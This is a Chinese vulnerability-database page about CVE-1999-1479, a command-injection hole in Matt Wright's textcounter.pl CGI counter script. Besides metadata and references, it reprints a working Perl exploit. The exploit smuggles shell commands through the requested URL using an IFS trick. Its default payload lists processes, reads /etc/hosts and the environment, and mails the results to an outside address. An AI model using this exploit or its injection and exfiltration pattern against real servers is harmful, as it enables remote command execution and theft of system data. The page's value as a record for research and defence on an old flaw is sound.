The textcounter.pl执行任意命令漏洞

The textcounter.pl执行任意命令漏洞

漏洞ID 1105361 漏洞类型 未知
发布时间 1998-06-24 更新时间 2005-10-20
图片[1]-The textcounter.pl执行任意命令漏洞-安全小百科CVE编号 CVE-1999-1479
图片[2]-The textcounter.pl执行任意命令漏洞-安全小百科CNNVD-ID CNNVD-199806-017
漏洞平台 CGI CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/20583
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199806-017
|漏洞详情
MattWright的textcounter.pl存在漏洞,远程攻击者借助shell元字符执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/2265/info

textcounter.pl is distributed through Matt's Scripts archive, and provides added features to httpd servers such as counters, guestbooks, and http cookie management. Due to insufficient checking of entered characters, it is possible for a remote user to input custom formatted strings into the $DOCUMENT_URI environment variable which, which when parsed can be executed as the UID of the httpd process. This makes it possible for a user with malicious intentions to execute arbitrary commands, and potentially gain access to the local host. 

#!/usr/bin/perl

$URL='http://dtp.kappa.ro/a/test.shtml';    # please _DO_ _modify_ this 
$EMAIL='[email protected],root';          # please _DO_ _modify_ this


if ($ARGV[0]) {
   $CMD=$ARGV[0];
}else{
   $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)|mail ${EMAIL} -sanothere_one";
}

$text="${URL}/;IFS=8;${CMD};echo|";
$text =~ s/ /${IFS}/g;

#print "$textn";

system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text); 
#system({"lynx"} "lynx", $text);     # if you don't have "wget"
                                  # you can try with "Lynx"
|参考资料

来源:XF
名称:http-cgi-textcounter(2052)
链接:http://xforce.iss.net/static/2052.php
来源:BUGTRAQ
名称:19980624textcounter.plSECURITYHOLE
链接:http://www.securityfocus.com/archive/1/9609
来源:BID
名称:2265
链接:http://www.securityfocus.com/bid/2265

相关推荐: OpenLink 远程缓冲区溢出漏洞

OpenLink 远程缓冲区溢出漏洞 漏洞ID 1105569 漏洞类型 缓冲区溢出 发布时间 1999-10-15 更新时间 2005-05-02 CVE编号 CVE-1999-0943 CNNVD-ID CNNVD-199910-030 漏洞平台 Linu…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享